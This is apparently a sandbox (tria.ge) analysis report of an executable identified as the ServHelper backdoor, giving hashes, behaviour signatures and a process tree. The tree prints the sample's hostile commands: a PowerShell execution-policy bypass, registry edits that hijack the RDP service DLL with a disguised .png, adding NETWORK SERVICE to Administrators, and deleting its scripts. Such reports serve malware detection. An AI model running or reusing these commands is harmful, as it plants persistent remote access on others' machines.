Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
95s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
10/10/2021, 11:58
Static task
static1
Behavioral task
behavioral1
Sample
cb3cc551561883ab8fc4fb6fc837a469.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
cb3cc551561883ab8fc4fb6fc837a469.exe
Resource
win10-en-20210920
General
-
Target
cb3cc551561883ab8fc4fb6fc837a469.exe
-
Size
4.0MB
-
MD5
cb3cc551561883ab8fc4fb6fc837a469
-
SHA1
f74ae6d243342099d3fa500cbc630f4a244a8d82
-
SHA256
ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
-
SHA512
b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3632 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe 3424 powershell.exe 3424 powershell.exe 3424 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 408 wrote to memory of 2488 408 net.exe 86 PID 408 wrote to memory of 2488 408 net.exe 86 PID 408 wrote to memory of 2488 408 net.exe 86 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 2380 1572 powershell.exe 97 PID 1572 wrote to memory of 2380 1572 powershell.exe 97 PID 1572 wrote to memory of 2380 1572 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v3nplro\5v3nplro.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5v3nplro\CSCB864D1E737C475DBB2095527C87833.TMP"4⤵PID:1144
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3200
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2328
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2380
-
-